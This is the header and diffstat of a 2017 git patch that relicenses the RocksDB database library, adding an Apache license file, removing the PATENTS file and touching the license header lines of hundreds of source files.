From 3c327ac2d0fd50bbd82fe1f1af5de909dad769e6 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Sat, 15 Jul 2017 16:03:42 -0700 Subject: [PATCH 001/205] Change RocksDB License Summary: Closes https://github.com/facebook/rocksdb/pull/2589 Differential Revision: D5431502 Pulled By: siying fbshipit-source-id: 8ebf8c87883daa9daa54b2303d11ce01ab1f6f75 --- LICENSE | 35 --- LICENSE.Apache | 202 ++++++++++++++++++ PATENTS | 33 --- build_tools/error_filter.py | 8 +- cache/cache_bench.cc | 8 +- cache/cache_test.cc | 8 +- cache/clock_cache.cc | 8 +- cache/clock_cache.h | 6 +- cache/lru_cache.cc | 8 +- cache/lru_cache.h | 8 +- cache/lru_cache_test.cc | 8 +- cache/sharded_cache.cc | 8 +- cache/sharded_cache.h | 8 +- db/builder.cc | 8 +- db/builder.h | 8 +- db/c.cc | 8 +- db/column_family.cc | 8 +- db/column_family.h | 8 +- db/column_family_test.cc | 7 +- db/compact_files_test.cc | 8 +- db/compacted_db_impl.cc | 8 +- db/compacted_db_impl.h | 8 +- db/compaction.cc | 8 +- db/compaction.h | 8 +- db/compaction_iteration_stats.h | 8 +- db/compaction_iterator.cc | 8 +- db/compaction_iterator.h | 8 +- db/compaction_iterator_test.cc | 8 +- db/compaction_job.cc | 8 +- db/compaction_job.h | 8 +- db/compaction_job_stats_test.cc | 8 +- db/compaction_job_test.cc | 8 +- db/compaction_picker.cc | 8 +- db/compaction_picker.h | 8 +- db/compaction_picker_test.cc | 8 +- db/compaction_picker_universal.cc | 8 +- db/compaction_picker_universal.h | 8 +- db/comparator_db_test.cc | 8 +- db/convenience.cc | 8 +- db/corruption_test.cc | 8 +- db/cuckoo_table_db_test.cc | 8 +- db/db_basic_test.cc | 8 +- db/db_block_cache_test.cc | 8 +- db/db_bloom_filter_test.cc | 8 +- db/db_compaction_filter_test.cc | 8 +- db/db_compaction_test.cc | 8 +- db/db_dynamic_level_test.cc | 8 +- db/db_encryption_test.cc | 8 +- db/db_filesnapshot.cc | 8 +- db/db_flush_test.cc | 8 +- db/db_impl.cc | 8 +- db/db_impl.h | 8 +- db/db_impl_compaction_flush.cc | 8 +- db/db_impl_debug.cc | 8 +- db/db_impl_experimental.cc | 8 +- db/db_impl_files.cc | 8 +- db/db_impl_open.cc | 8 +- db/db_impl_readonly.cc | 8 +- db/db_impl_readonly.h | 8 +- db/db_impl_write.cc | 8 +- db/db_info_dumper.cc | 8 +- db/db_info_dumper.h | 8 +- db/db_inplace_update_test.cc | 8 +- db/db_io_failure_test.cc | 8 +- db/db_iter.cc | 8 +- db/db_iter.h | 8 +- db/db_iter_test.cc | 8 +- db/db_iterator_test.cc | 8 +- db/db_log_iter_test.cc | 8 +- db/db_memtable_test.cc | 8 +- db/db_merge_operator_test.cc | 8 +- db/db_options_test.cc | 8 +- db/db_properties_test.cc | 6 +- db/db_range_del_test.cc | 8 +- db/db_sst_test.cc | 8 +- db/db_statistics_test.cc | 8 +- db/db_table_properties_test.cc | 8 +- db/db_tailing_iter_test.cc | 8 +- db/db_test.cc | 8 +- db/db_test2.cc | 8 +- db/db_test_util.cc | 6 +- db/db_test_util.h | 6 +- db/db_universal_compaction_test.cc | 8 +- db/db_wal_test.cc | 8 +- db/db_write_test.cc | 8 +- db/dbformat.cc | 8 +- db/dbformat.h | 8 +- db/dbformat_test.cc | 8 +- db/deletefile_test.cc | 8 +- db/event_helpers.cc | 8 +- db/event_helpers.h | 8 +- db/experimental.cc | 8 +- db/external_sst_file_basic_test.cc | 8 +- db/external_sst_file_ingestion_job.cc | 8 +- db/external_sst_file_ingestion_job.h | 8 +- db/external_sst_file_test.cc | 8 +- db/fault_injection_test.cc | 8 +- db/file_indexer.cc | 8 +- db/file_indexer.h | 8 +- db/file_indexer_test.cc | 8 +- db/filename_test.cc | 8 +- db/flush_job.cc | 8 +- db/flush_job.h | 8 +- db/flush_job_test.cc | 8 +- db/flush_scheduler.cc | 8 +- db/flush_scheduler.h | 8 +- db/forward_iterator.cc | 8 +- db/forward_iterator.h | 8 +- db/forward_iterator_bench.cc | 8 +- db/internal_stats.cc | 8 +- db/internal_stats.h | 8 +- db/job_context.h | 8 +- db/listener_test.cc | 8 +- db/log_format.h | 8 +- db/log_reader.cc | 8 +- db/log_reader.h | 8 +- db/log_test.cc | 8 +- db/log_writer.cc | 8 +- db/log_writer.h | 8 +- db/malloc_stats.cc | 6 +- db/malloc_stats.h | 6 +- db/managed_iterator.cc | 8 +- db/managed_iterator.h | 8 +- db/manual_compaction_test.cc | 8 +- db/memtable.cc | 8 +- db/memtable.h | 8 +- db/memtable_list.cc | 8 +- db/memtable_list.h | 8 +- db/memtable_list_test.cc | 8 +- db/merge_context.h | 8 +- db/merge_helper.cc | 8 +- db/merge_helper.h | 8 +- db/merge_helper_test.cc | 8 +- db/merge_operator.cc | 8 +- db/merge_test.cc | 8 +- db/options_file_test.cc | 8 +- db/perf_context_test.cc | 8 +- db/pinned_iterators_manager.h | 8 +- db/plain_table_db_test.cc | 8 +- db/prefix_test.cc | 8 +- db/range_del_aggregator.cc | 8 +- db/range_del_aggregator.h | 8 +- db/range_del_aggregator_test.cc | 8 +- db/repair.cc | 8 +- db/repair_test.cc | 8 +- db/snapshot_impl.cc | 8 +- db/snapshot_impl.h | 8 +- db/table_cache.cc | 8 +- db/table_cache.h | 8 +- db/table_properties_collector.cc | 8 +- db/table_properties_collector.h | 8 +- db/table_properties_collector_test.cc | 8 +- db/transaction_log_impl.cc | 8 +- db/transaction_log_impl.h | 8 +- db/version_builder.cc | 8 +- db/version_builder.h | 8 +- db/version_builder_test.cc | 8 +- db/version_edit.cc | 8 +- db/version_edit.h | 8 +- db/version_edit_test.cc | 8 +- db/version_set.cc | 8 +- db/version_set.h | 8 +- db/version_set_test.cc | 8 +- db/wal_manager.cc | 8 +- db/wal_manager.h | 8 +- db/wal_manager_test.cc | 8 +- db/write_batch.cc | 8 +- db/write_batch_base.cc | 8 +- db/write_batch_internal.h | 8 +- db/write_batch_test.cc | 8 +- db/write_callback.h | 6 +- db/write_callback_test.cc | 8 +- db/write_controller.cc | 8 +- db/write_controller.h | 8 +- db/write_controller_test.cc | 8 +- db/write_thread.cc | 8 +- db/write_thread.h | 8 +- env/env.cc | 8 +- env/env_chroot.cc | 8 +- env/env_chroot.h | 8 +- env/env_encryption.cc | 8 +- env/env_hdfs.cc | 8 +- env/env_posix.cc | 8 +- env/env_test.cc | 8 +- env/io_posix.cc | 8 +- env/io_posix.h | 8 +- env/mock_env.cc | 8 +- env/mock_env.h | 8 +- env/posix_logger.h | 8 +- examples/c_simple_example.c | 8 +- examples/column_families_example.cc | 6 +- examples/compact_files_example.cc | 6 +- examples/compaction_filter_example.cc | 6 +- examples/optimistic_transaction_example.cc | 6 +- examples/options_file_example.cc | 6 +- examples/simple_example.cc | 6 +- examples/transaction_example.cc | 6 +- hdfs/env_hdfs.h | 8 +- include/rocksdb/advanced_options.h | 6 +- include/rocksdb/c.h | 11 +- include/rocksdb/cache.h | 6 +- include/rocksdb/cleanable.h | 6 +- include/rocksdb/compaction_filter.h | 6 +- include/rocksdb/compaction_job_stats.h | 6 +- include/rocksdb/comparator.h | 6 +- include/rocksdb/convenience.h | 6 +- include/rocksdb/db.h | 6 +- include/rocksdb/db_bench_tool.h | 6 +- include/rocksdb/db_dump_tool.h | 8 +- include/rocksdb/env.h | 6 +- include/rocksdb/env_encryption.h | 8 +- include/rocksdb/experimental.h | 6 +- include/rocksdb/filter_policy.h | 6 +- include/rocksdb/flush_block_policy.h | 6 +- include/rocksdb/iostats_context.h | 6 +- include/rocksdb/iterator.h | 6 +- include/rocksdb/ldb_tool.h | 6 +- include/rocksdb/memtablerep.h | 6 +- include/rocksdb/merge_operator.h | 6 +- include/rocksdb/metadata.h | 6 +- include/rocksdb/options.h | 6 +- include/rocksdb/perf_context.h | 6 +- include/rocksdb/perf_level.h | 6 +- include/rocksdb/persistent_cache.h | 6 +- include/rocksdb/rate_limiter.h | 8 +- include/rocksdb/slice.h | 6 +- include/rocksdb/slice_transform.h | 6 +- include/rocksdb/snapshot.h | 8 +- include/rocksdb/sst_dump_tool.h | 6 +- include/rocksdb/sst_file_manager.h | 8 +- include/rocksdb/sst_file_writer.h | 8 +- include/rocksdb/statistics.h | 6 +- include/rocksdb/status.h | 6 +- include/rocksdb/thread_status.h | 6 +- include/rocksdb/threadpool.h | 8 +- include/rocksdb/transaction_log.h | 6 +- include/rocksdb/types.h | 6 +- include/rocksdb/universal_compaction.h | 6 +- include/rocksdb/utilities/backupable_db.h | 8 +- include/rocksdb/utilities/checkpoint.h | 6 +- include/rocksdb/utilities/convenience.h | 6 +- include/rocksdb/utilities/date_tiered_db.h | 8 +- include/rocksdb/utilities/db_ttl.h | 8 +- include/rocksdb/utilities/debug.h | 6 +- include/rocksdb/utilities/document_db.h | 8 +- include/rocksdb/utilities/env_librados.h | 6 +- include/rocksdb/utilities/env_mirror.h | 6 +- include/rocksdb/utilities/geo_db.h | 8 +- include/rocksdb/utilities/info_log_finder.h | 6 +- include/rocksdb/utilities/json_document.h | 8 +- include/rocksdb/utilities/ldb_cmd.h | 8 +- .../utilities/ldb_cmd_execute_result.h | 8 +- include/rocksdb/utilities/leveldb_options.h | 8 +- .../lua/rocks_lua_compaction_filter.h | 8 +- .../utilities/lua/rocks_lua_custom_library.h | 8 +- .../rocksdb/utilities/lua/rocks_lua_util.h | 8 +- include/rocksdb/utilities/memory_util.h | 6 +- include/rocksdb/utilities/object_registry.h | 6 +- .../utilities/optimistic_transaction_db.h | 8 +- .../utilities/option_change_migration.h | 8 +- include/rocksdb/utilities/options_util.h | 6 +- include/rocksdb/utilities/sim_cache.h | 6 +- include/rocksdb/utilities/spatial_db.h | 8 +- .../utilities/table_properties_collectors.h | 8 +- include/rocksdb/utilities/transaction.h | 6 +- include/rocksdb/utilities/transaction_db.h | 8 +- .../rocksdb/utilities/transaction_db_mutex.h | 8 +- .../utilities/write_batch_with_index.h | 6 +- include/rocksdb/version.h | 6 +- include/rocksdb/wal_filter.h | 6 +- include/rocksdb/write_batch.h | 6 +- include/rocksdb/write_batch_base.h | 6 +- include/rocksdb/write_buffer_manager.h | 8 +- .../org/rocksdb/benchmark/DbBenchmark.java | 6 +- java/rocksjni/backupablejni.cc | 6 +- java/rocksjni/backupenginejni.cc | 6 +- java/rocksjni/cassandra_value_operator.cc | 6 +- java/rocksjni/checkpoint.cc | 6 +- java/rocksjni/clock_cache.cc | 6 +- java/rocksjni/columnfamilyhandle.cc | 6 +- java/rocksjni/compaction_filter.cc | 6 +- java/rocksjni/compaction_options_fifo.cc | 6 +- java/rocksjni/compaction_options_universal.cc | 6 +- java/rocksjni/comparator.cc | 6 +- java/rocksjni/comparatorjnicallback.cc | 6 +- java/rocksjni/comparatorjnicallback.h | 6 +- java/rocksjni/compression_options.cc | 6 +- java/rocksjni/env.cc | 6 +- java/rocksjni/env_options.cc | 6 +- java/rocksjni/filter.cc | 6 +- java/rocksjni/ingest_external_file_options.cc | 6 +- java/rocksjni/iterator.cc | 6 +- java/rocksjni/loggerjnicallback.cc | 6 +- java/rocksjni/loggerjnicallback.h | 6 +- java/rocksjni/lru_cache.cc | 6 +- java/rocksjni/memtablejni.cc | 6 +- java/rocksjni/merge_operator.cc | 6 +- java/rocksjni/options.cc | 6 +- java/rocksjni/portal.h | 6 +- java/rocksjni/ratelimiterjni.cc | 6 +- .../remove_emptyvalue_compactionfilterjni.cc | 6 +- java/rocksjni/restorejni.cc | 6 +- java/rocksjni/rocksdb_exception_test.cc | 6 +- java/rocksjni/rocksjni.cc | 6 +- java/rocksjni/slice.cc | 6 +- java/rocksjni/snapshot.cc | 6 +- java/rocksjni/sst_file_writerjni.cc | 6 +- java/rocksjni/statistics.cc | 6 +- java/rocksjni/statisticsjni.cc | 6 +- java/rocksjni/statisticsjni.h | 6 +- java/rocksjni/table.cc | 6 +- java/rocksjni/transaction_log.cc | 6 +- java/rocksjni/ttl.cc | 6 +- java/rocksjni/write_batch.cc | 6 +- java/rocksjni/write_batch_test.cc | 6 +- java/rocksjni/write_batch_with_index.cc | 6 +- java/rocksjni/writebatchhandlerjnicallback.cc | 6 +- java/rocksjni/writebatchhandlerjnicallback.h | 6 +- .../main/java/RocksDBColumnFamilySample.java | 6 +- java/samples/src/main/java/RocksDBSample.java | 6 +- .../org/rocksdb/AbstractCompactionFilter.java | 6 +- .../java/org/rocksdb/AbstractComparator.java | 6 +- .../AbstractImmutableNativeReference.java | 6 +- .../org/rocksdb/AbstractNativeReference.java | 6 +- .../org/rocksdb/AbstractRocksIterator.java | 6 +- .../main/java/org/rocksdb/AbstractSlice.java | 6 +- .../java/org/rocksdb/AbstractWriteBatch.java | 6 +- .../src/main/java/org/rocksdb/AccessHint.java | 6 +- .../AdvancedColumnFamilyOptionsInterface.java | 6 +- ...edMutableColumnFamilyOptionsInterface.java | 6 +- .../main/java/org/rocksdb/BackupEngine.java | 6 +- .../src/main/java/org/rocksdb/BackupInfo.java | 6 +- .../java/org/rocksdb/BackupableDBOptions.java | 6 +- .../org/rocksdb/BlockBasedTableConfig.java | 6 +- .../main/java/org/rocksdb/BloomFilter.java | 6 +- .../java/org/rocksdb/BuiltinComparator.java | 6 +- java/src/main/java/org/rocksdb/Cache.java | 6 +- .../rocksdb/CassandraValueMergeOperator.java | 6 +- .../src/main/java/org/rocksdb/Checkpoint.java | 6 +- .../main/java/org/rocksdb/ChecksumType.java | 6 +- .../src/main/java/org/rocksdb/ClockCache.java | 6 +- .../org/rocksdb/ColumnFamilyDescriptor.java | 6 +- .../java/org/rocksdb/ColumnFamilyHandle.java | 6 +- .../java/org/rocksdb/ColumnFamilyOptions.java | 6 +- .../rocksdb/ColumnFamilyOptionsInterface.java | 6 +- .../org/rocksdb/CompactionOptionsFIFO.java | 6 +- .../rocksdb/CompactionOptionsUniversal.java | 6 +- .../java/org/rocksdb/CompactionPriority.java | 6 +- .../java/org/rocksdb/CompactionStyle.java | 6 +- .../src/main/java/org/rocksdb/Comparator.java | 6 +- .../java/org/rocksdb/CompressionOptions.java | 6 +- .../java/org/rocksdb/CompressionType.java | 6 +- java/src/main/java/org/rocksdb/DBOptions.java | 6 +- .../java/org/rocksdb/DBOptionsInterface.java | 6 +- java/src/main/java/org/rocksdb/DbPath.java | 6 +- .../java/org/rocksdb/DirectComparator.java | 6 +- .../main/java/org/rocksdb/DirectSlice.java | 6 +- .../main/java/org/rocksdb/EncodingType.java | 6 +- java/src/main/java/org/rocksdb/Env.java | 6 +- .../src/main/java/org/rocksdb/EnvOptions.java | 6 +- .../main/java/org/rocksdb/Experimental.java | 6 +- java/src/main/java/org/rocksdb/Filter.java | 6 +- .../main/java/org/rocksdb/HistogramData.java | 6 +- .../main/java/org/rocksdb/HistogramType.java | 6 +- java/src/main/java/org/rocksdb/IndexType.java | 6 +- .../rocksdb/IngestExternalFileOptions.java | 6 +- java/src/main/java/org/rocksdb/LRUCache.java | 6 +- java/src/main/java/org/rocksdb/Logger.java | 6 +- .../main/java/org/rocksdb/MemTableConfig.java | 6 +- .../main/java/org/rocksdb/MergeOperator.java | 6 +- .../rocksdb/MutableColumnFamilyOptions.java | 6 +- .../MutableColumnFamilyOptionsInterface.java | 6 +- java/src/main/java/org/rocksdb/Options.java | 6 +- .../java/org/rocksdb/PlainTableConfig.java | 6 +- .../main/java/org/rocksdb/RateLimiter.java | 6 +- .../main/java/org/rocksdb/ReadOptions.java | 6 +- java/src/main/java/org/rocksdb/ReadTier.java | 6 +- .../RemoveEmptyValueCompactionFilter.java | 6 +- .../main/java/org/rocksdb/RestoreOptions.java | 6 +- java/src/main/java/org/rocksdb/RocksDB.java | 6 +- .../java/org/rocksdb/RocksDBException.java | 6 +- java/src/main/java/org/rocksdb/RocksEnv.java | 6 +- .../main/java/org/rocksdb/RocksIterator.java | 6 +- .../org/rocksdb/RocksIteratorInterface.java | 6 +- .../main/java/org/rocksdb/RocksMemEnv.java | 6 +- .../java/org/rocksdb/RocksMutableObject.java | 6 +- .../main/java/org/rocksdb/RocksObject.java | 6 +- java/src/main/java/org/rocksdb/Slice.java | 6 +- java/src/main/java/org/rocksdb/Snapshot.java | 6 +- .../main/java/org/rocksdb/SstFileWriter.java | 6 +- .../src/main/java/org/rocksdb/Statistics.java | 6 +- .../java/org/rocksdb/StatisticsCollector.java | 6 +- .../rocksdb/StatisticsCollectorCallback.java | 6 +- .../java/org/rocksdb/StatsCollectorInput.java | 6 +- .../src/main/java/org/rocksdb/StatsLevel.java | 6 +- java/src/main/java/org/rocksdb/Status.java | 6 +- .../org/rocksdb/StringAppendOperator.java | 6 +- .../java/org/rocksdb/TableFormatConfig.java | 6 +- .../src/main/java/org/rocksdb/TickerType.java | 6 +- java/src/main/java/org/rocksdb/TtlDB.java | 6 +- .../java/org/rocksdb/WALRecoveryMode.java | 6 +- .../java/org/rocksdb/WBWIRocksIterator.java | 6 +- .../src/main/java/org/rocksdb/WriteBatch.java | 6 +- .../java/org/rocksdb/WriteBatchInterface.java | 6 +- .../java/org/rocksdb/WriteBatchWithIndex.java | 6 +- .../main/java/org/rocksdb/WriteOptions.java | 6 +- .../org/rocksdb/util/BytewiseComparator.java | 6 +- .../util/DirectBytewiseComparator.java | 6 +- .../util/ReverseBytewiseComparator.java | 6 +- .../main/java/org/rocksdb/util/SizeUnit.java | 6 +- .../org/rocksdb/AbstractComparatorTest.java | 6 +- .../java/org/rocksdb/BackupEngineTest.java | 6 +- .../org/rocksdb/BackupableDBOptionsTest.java | 6 +- .../rocksdb/BlockBasedTableConfigTest.java | 6 +- .../test/java/org/rocksdb/ClockCacheTest.java | 6 +- .../org/rocksdb/ColumnFamilyOptionsTest.java | 6 +- .../java/org/rocksdb/ColumnFamilyTest.java | 6 +- .../rocksdb/CompactionOptionsFIFOTest.java | 6 +- .../CompactionOptionsUniversalTest.java | 6 +- .../org/rocksdb/CompactionPriorityTest.java | 6 +- .../org/rocksdb/CompactionStopStyleTest.java | 6 +- .../org/rocksdb/ComparatorOptionsTest.java | 6 +- .../test/java/org/rocksdb/ComparatorTest.java | 6 +- .../org/rocksdb/CompressionOptionsTest.java | 6 +- .../org/rocksdb/CompressionTypesTest.java | 6 +- .../test/java/org/rocksdb/DBOptionsTest.java | 6 +- .../org/rocksdb/DirectComparatorTest.java | 6 +- .../java/org/rocksdb/DirectSliceTest.java | 6 +- .../test/java/org/rocksdb/EnvOptionsTest.java | 6 +- .../src/test/java/org/rocksdb/FilterTest.java | 6 +- java/src/test/java/org/rocksdb/FlushTest.java | 6 +- .../IngestExternalFileOptionsTest.java | 6 +- .../java/org/rocksdb/KeyMayExistTest.java | 6 +- .../test/java/org/rocksdb/LRUCacheTest.java | 6 +- .../test/java/org/rocksdb/MemTableTest.java | 6 +- java/src/test/java/org/rocksdb/MergeTest.java | 6 +- .../java/org/rocksdb/MixedOptionsTest.java | 6 +- .../MutableColumnFamilyOptionsTest.java | 6 +- .../org/rocksdb/NativeLibraryLoaderTest.java | 6 +- .../test/java/org/rocksdb/OptionsTest.java | 6 +- .../org/rocksdb/PlainTableConfigTest.java | 6 +- .../org/rocksdb/PlatformRandomHelper.java | 6 +- .../java/org/rocksdb/RateLimiterTest.java | 6 +- .../test/java/org/rocksdb/ReadOnlyTest.java | 6 +- .../java/org/rocksdb/ReadOptionsTest.java | 6 +- .../org/rocksdb/RocksDBExceptionTest.java | 6 +- .../test/java/org/rocksdb/RocksDBTest.java | 6 +- .../test/java/org/rocksdb/RocksEnvTest.java | 6 +- .../java/org/rocksdb/RocksIteratorTest.java | 6 +- .../java/org/rocksdb/RocksMemEnvTest.java | 6 +- java/src/test/java/org/rocksdb/SliceTest.java | 6 +- .../test/java/org/rocksdb/SnapshotTest.java | 6 +- .../java/org/rocksdb/SstFileWriterTest.java | 6 +- .../org/rocksdb/StatisticsCollectorTest.java | 6 +- .../test/java/org/rocksdb/StatisticsTest.java | 6 +- .../java/org/rocksdb/StatsCallbackMock.java | 6 +- java/src/test/java/org/rocksdb/TtlDBTest.java | 6 +- java/src/test/java/org/rocksdb/Types.java | 6 +- .../java/org/rocksdb/WALRecoveryModeTest.java | 6 +- .../org/rocksdb/WriteBatchHandlerTest.java | 6 +- .../test/java/org/rocksdb/WriteBatchTest.java | 6 +- .../org/rocksdb/WriteBatchThreadedTest.java | 6 +- .../org/rocksdb/WriteBatchWithIndexTest.java | 6 +- .../java/org/rocksdb/WriteOptionsTest.java | 6 +- .../org/rocksdb/test/RocksJunitRunner.java | 6 +- .../rocksdb/util/BytewiseComparatorTest.java | 6 +- .../org/rocksdb/util/EnvironmentTest.java | 6 +- .../java/org/rocksdb/util/SizeUnitTest.java | 6 +- memtable/alloc_tracker.cc | 8 +- memtable/hash_cuckoo_rep.cc | 8 +- memtable/hash_cuckoo_rep.h | 6 +- memtable/hash_linklist_rep.cc | 8 +- memtable/hash_linklist_rep.h | 6 +- memtable/hash_skiplist_rep.cc | 8 +- memtable/hash_skiplist_rep.h | 6 +- memtable/inlineskiplist.h | 7 +- memtable/inlineskiplist_test.cc | 8 +- memtable/memtablerep_bench.cc | 8 +- memtable/skiplist.h | 8 +- memtable/skiplist_test.cc | 8 +- memtable/skiplistrep.cc | 8 +- memtable/stl_wrappers.h | 8 +- memtable/vectorrep.cc | 8 +- memtable/write_buffer_manager.cc | 8 +- memtable/write_buffer_manager_test.cc | 8 +- monitoring/file_read_sample.h | 8 +- monitoring/histogram.cc | 8 +- monitoring/histogram.h | 8 +- monitoring/histogram_test.cc | 8 +- monitoring/histogram_windowing.cc | 8 +- monitoring/histogram_windowing.h | 8 +- monitoring/instrumented_mutex.cc | 8 +- monitoring/instrumented_mutex.h | 8 +- monitoring/iostats_context.cc | 6 +- monitoring/iostats_context_imp.h | 8 +- monitoring/iostats_context_test.cc | 6 +- monitoring/perf_context.cc | 8 +- monitoring/perf_context_imp.h | 8 +- monitoring/perf_level.cc | 8 +- monitoring/perf_level_imp.h | 8 +- monitoring/perf_step_timer.h | 8 +- monitoring/statistics.cc | 8 +- monitoring/statistics.h | 8 +- monitoring/statistics_test.cc | 8 +- monitoring/thread_status_impl.cc | 6 +- monitoring/thread_status_updater.cc | 6 +- monitoring/thread_status_updater.h | 6 +- monitoring/thread_status_updater_debug.cc | 6 +- monitoring/thread_status_util.cc | 6 +- monitoring/thread_status_util.h | 6 +- monitoring/thread_status_util_debug.cc | 6 +- options/cf_options.cc | 8 +- options/cf_options.h | 6 +- options/db_options.cc | 6 +- options/db_options.h | 6 +- options/options.cc | 8 +- options/options_helper.cc | 8 +- options/options_helper.h | 6 +- options/options_parser.cc | 6 +- options/options_parser.h | 6 +- options/options_sanity_check.cc | 6 +- options/options_sanity_check.h | 6 +- options/options_settable_test.cc | 8 +- options/options_test.cc | 8 +- port/dirent.h | 8 +- port/likely.h | 8 +- port/port.h | 8 +- port/port_example.h | 8 +- port/port_posix.cc | 8 +- port/port_posix.h | 8 +- port/stack_trace.cc | 8 +- port/stack_trace.h | 8 +- port/sys_time.h | 8 +- port/util_logger.h | 8 +- port/win/env_default.cc | 8 +- port/win/env_win.cc | 8 +- port/win/env_win.h | 6 +- port/win/io_win.cc | 8 +- port/win/io_win.h | 8 +- port/win/port_win.cc | 8 +- port/win/port_win.h | 8 +- port/win/win_logger.cc | 8 +- port/win/win_logger.h | 8 +- port/win/win_thread.cc | 8 +- port/win/win_thread.h | 8 +- port/win/xpress_win.cc | 8 +- port/win/xpress_win.h | 8 +- port/xpress.h | 8 +- table/block.cc | 8 +- table/block.h | 8 +- table/block_based_filter_block.cc | 8 +- table/block_based_filter_block.h | 8 +- table/block_based_filter_block_test.cc | 8 +- table/block_based_table_builder.cc | 8 +- table/block_based_table_builder.h | 8 +- table/block_based_table_factory.cc | 8 +- table/block_based_table_factory.h | 8 +- table/block_based_table_reader.cc | 8 +- table/block_based_table_reader.h | 8 +- table/block_builder.cc | 8 +- table/block_builder.h | 8 +- table/block_prefix_index.cc | 6 +- table/block_prefix_index.h | 6 +- table/block_test.cc | 8 +- table/bloom_block.cc | 8 +- table/bloom_block.h | 8 +- table/cleanable_test.cc | 8 +- table/cuckoo_table_builder.cc | 8 +- table/cuckoo_table_builder.h | 8 +- table/cuckoo_table_builder_test.cc | 6 +- table/cuckoo_table_factory.cc | 6 +- table/cuckoo_table_factory.h | 6 +- table/cuckoo_table_reader.cc | 8 +- table/cuckoo_table_reader.h | 8 +- table/cuckoo_table_reader_test.cc | 6 +- table/filter_block.h | 8 +- table/flush_block_policy.cc | 8 +- table/format.cc | 8 +- table/format.h | 8 +- table/full_filter_bits_builder.h | 6 +- table/full_filter_block.cc | 8 +- table/full_filter_block.h | 8 +- table/full_filter_block_test.cc | 8 +- table/get_context.cc | 8 +- table/get_context.h | 8 +- table/index_builder.cc | 8 +- table/index_builder.h | 8 +- table/internal_iterator.h | 6 +- table/iter_heap.h | 8 +- table/iterator.cc | 8 +- table/iterator_wrapper.h | 8 +- table/merger_test.cc | 8 +- table/merging_iterator.cc | 8 +- table/merging_iterator.h | 8 +- table/meta_blocks.cc | 8 +- table/meta_blocks.h | 8 +- table/mock_table.cc | 8 +- table/mock_table.h | 8 +- table/partitioned_filter_block.cc | 8 +- table/partitioned_filter_block.h | 8 +- table/partitioned_filter_block_test.cc | 8 +- table/persistent_cache_helper.cc | 8 +- table/persistent_cache_helper.h | 8 +- table/persistent_cache_options.h | 8 +- table/plain_table_builder.cc | 8 +- table/plain_table_builder.h | 8 +- table/plain_table_index.cc | 8 +- table/plain_table_index.h | 8 +- table/plain_table_key_coding.cc | 8 +- table/plain_table_key_coding.h | 8 +- table/scoped_arena_iterator.h | 6 +- table/sst_file_writer.cc | 8 +- table/sst_file_writer_collectors.h | 8 +- table/table_builder.h | 8 +- table/table_properties.cc | 8 +- table/table_properties_internal.h | 8 +- table/table_reader.h | 8 +- table/table_reader_bench.cc | 8 +- table/table_test.cc | 8 +- table/two_level_iterator.cc | 8 +- table/two_level_iterator.h | 8 +- third-party/fbson/FbsonDocument.h | 13 +- third-party/fbson/FbsonJsonParser.h | 13 +- third-party/fbson/FbsonStream.h | 13 +- third-party/fbson/FbsonUtil.h | 13 +- third-party/fbson/FbsonWriter.h | 13 +- tools/blob_dump.cc | 8 +- tools/db_bench.cc | 8 +- tools/db_bench_tool.cc | 8 +- tools/db_bench_tool_test.cc | 8 +- tools/db_repl_stress.cc | 8 +- tools/db_sanity_test.cc | 8 +- tools/db_stress.cc | 8 +- tools/dump/db_dump_tool.cc | 8 +- tools/dump/rocksdb_dump.cc | 8 +- tools/dump/rocksdb_undump.cc | 8 +- tools/ldb.cc | 8 +- tools/ldb_cmd.cc | 8 +- tools/ldb_cmd_impl.h | 8 +- tools/ldb_cmd_test.cc | 8 +- tools/ldb_tool.cc | 8 +- tools/reduce_levels_test.cc | 8 +- tools/sst_dump.cc | 8 +- tools/sst_dump_test.cc | 8 +- tools/sst_dump_tool.cc | 8 +- tools/sst_dump_tool_imp.h | 6 +- tools/write_stress.cc | 6 +- util/aligned_buffer.h | 8 +- util/allocator.h | 8 +- util/arena.cc | 8 +- util/arena.h | 8 +- util/arena_test.cc | 8 +- util/auto_roll_logger.cc | 8 +- util/auto_roll_logger.h | 8 +- util/auto_roll_logger_test.cc | 8 +- util/autovector.h | 8 +- util/autovector_test.cc | 8 +- util/bloom.cc | 8 +- util/bloom_test.cc | 8 +- util/build_version.h | 8 +- util/channel.h | 8 +- util/coding.cc | 8 +- util/coding.h | 8 +- util/coding_test.cc | 8 +- util/compaction_job_stats_impl.cc | 6 +- util/comparator.cc | 8 +- util/compression.h | 6 +- util/concurrent_arena.cc | 8 +- util/concurrent_arena.h | 8 +- util/core_local.h | 8 +- util/crc32c.cc | 8 +- util/crc32c.h | 8 +- util/crc32c_test.cc | 8 +- util/delete_scheduler.cc | 8 +- util/delete_scheduler.h | 8 +- util/delete_scheduler_test.cc | 8 +- util/dynamic_bloom.cc | 6 +- util/dynamic_bloom.h | 6 +- util/dynamic_bloom_test.cc | 8 +- util/event_logger.cc | 8 +- util/event_logger.h | 8 +- util/event_logger_test.cc | 8 +- util/fault_injection_test_env.cc | 8 +- util/fault_injection_test_env.h | 8 +- util/file_reader_writer.cc | 8 +- util/file_reader_writer.h | 8 +- util/file_reader_writer_test.cc | 8 +- util/file_util.cc | 8 +- util/file_util.h | 8 +- util/filelock_test.cc | 8 +- util/filename.cc | 8 +- util/filename.h | 8 +- util/filter_policy.cc | 8 +- util/hash.cc | 8 +- util/hash.h | 8 +- util/hash_map.h | 8 +- util/hash_test.cc | 8 +- util/heap.h | 8 +- util/heap_test.cc | 8 +- util/kv_map.h | 8 +- util/log_buffer.cc | 8 +- util/log_buffer.h | 6 +- util/log_write_bench.cc | 8 +- util/logging.h | 8 +- util/memory_usage.h | 8 +- util/mpsc.h | 6 +- util/murmurhash.cc | 8 +- util/murmurhash.h | 8 +- util/mutexlock.h | 8 +- util/random.cc | 8 +- util/random.h | 8 +- util/rate_limiter.cc | 8 +- util/rate_limiter.h | 8 +- util/rate_limiter_test.cc | 8 +- util/slice.cc | 8 +- util/slice_transform_test.cc | 8 +- util/sst_file_manager_impl.cc | 8 +- util/sst_file_manager_impl.h | 8 +- util/status.cc | 8 +- util/status_message.cc | 6 +- util/stderr_logger.h | 8 +- util/stop_watch.h | 8 +- util/string_util.cc | 8 +- util/string_util.h | 8 +- util/sync_point.cc | 8 +- util/sync_point.h | 8 +- util/testharness.cc | 8 +- util/testharness.h | 8 +- util/testutil.cc | 8 +- util/testutil.h | 8 +- util/thread_list_test.cc | 8 +- util/thread_local.cc | 8 +- util/thread_local.h | 8 +- util/thread_local_test.cc | 8 +- util/thread_operation.h | 6 +- 